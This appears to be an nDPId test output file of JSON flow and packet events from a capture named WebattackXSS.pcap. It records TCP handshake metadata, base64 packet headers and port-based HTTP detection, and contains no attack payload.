-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347428671,"flow_last_seen":1499347433734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347431192,"flow_last_seen":1499347436733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347432482,"flow_last_seen":1499347437734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347557789,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347557789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82zBAAD4G6p+sEAABwKgKMuRkAFBn0PMDAAAAAKACchD2DAAAAgQFtAQCCAoBOygzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":2,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5GT+u1l1Z9DzBKAScSChLQAAAgQFtAQCCAoD5PmoATsoMwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":3,"flow_last_seen":1499347557790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347557790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02zFAAD4G6qasEAABwKgKMuRkAFBn0PME\/rtZdoAQAOVANQAAAQEICgE7KDMD5Pmo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347559043,"flow_last_seen":1499347559043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347559043,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1499347559043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nvhAAD4GJtisEAABwKgKMuRyAFDmPbeUAAAAAKACchCxxwAAAgQFtAQCCAoBOylsAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":2,"flow_last_seen":1499347559043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5HJJe\/AM5j23laAScSB6VwAAAgQFtAQCCAoD5PriATspbAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":3,"flow_last_seen":1499347559044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347559044,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nvlAAD4GJt+sEAABwKgKMuRyAFDmPbeVSXvwDYAQAOUZXgAAAQEICgE7KW0D5Pri"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347560327,"flow_last_seen":1499347560327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347560327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1499347560327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRJAAD4GGL6sEAABwKgKMuSAAFBDKIe8AAAAAKACchCDZQAAAgQFtAQCCAoBOyquAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":2,"flow_last_seen":1499347560327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ICL+5A8QyiHvaAScSBoBAAAAgQFtAQCCAoD5PwjATsqrgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":3,"flow_last_seen":1499347560328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347560328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRNAAD4GGMWsEAABwKgKMuSAAFBDKIe9i\/uQPYAQAOUHDAAAAQEICgE7Kq4D5Pwj"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347561622,"flow_last_seen":1499347561622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347561622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1499347561622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JPRAAD4GoNysEAABwKgKMuSOAFBq0Q8FAAAAAKACchDTIgAAAgQFtAQCCAoBOyvxAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":2,"flow_last_seen":1499347561622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5I6fc34\/atEPBqAScSC1AgAAAgQFtAQCCAoD5P1nATsr8QEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":3,"flow_last_seen":1499347561623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347561623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JPVAAD4GoOOsEAABwKgKMuSOAFBq0Q8Gn3N+QIAQAOVUCgAAAQEICgE7K\/ED5P1n"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347564211,"flow_last_seen":1499347564211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347564211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1499347564211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87W5AAD4G2GGsEAABwKgKMuSoAFCF1MMXAAAAAKACchABawAAAgQFtAQCCAoBOy55AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":2,"flow_last_seen":1499347564212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564212,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5KgQ0EVbhdTDGKAScSCoSwAAAgQFtAQCCAoD5P\/uATsueQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":3,"flow_last_seen":1499347564212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347564212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07W9AAD4G2GisEAABwKgKMuSoAFCF1MMYENBFXIAQAOVHUwAAAQEICgE7LnkD5P\/u"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347565457,"flow_last_seen":1499347565457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347565457,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1499347565457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565457,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CLtAAD4GvRWsEAABwKgKMuS2AFBcaycLAAAAAKACchDFmwAAAgQFtAQCCAoBOy+wAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":2,"flow_last_seen":1499347565458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565458,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5La+IYdMXGsnDKAScSB8AQAAAgQFtAQCCAoD5QEmATsvsAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":3,"flow_last_seen":1499347565458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347565458,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CLxAAD4GvRysEAABwKgKMuS2AFBcaycMviGHTYAQAOUbCQAAAQEICgE7L7AD5QEm"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347566719,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bldAAD4GV3msEAABwKgKMuTEAFDBpl67AAAAAKACchAnZgAAAgQFtAQCCAoBOzDsAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":2,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5MTiLAwhwaZevKAScSAzsQAAAgQFtAQCCAoD5QJhATsw7AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":3,"flow_last_seen":1499347566720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347566720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0blhAAD4GV4CsEAABwKgKMuTEAFDBpl684iwMIoAQAOXSuAAAAQEICgE7MOwD5QJh"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 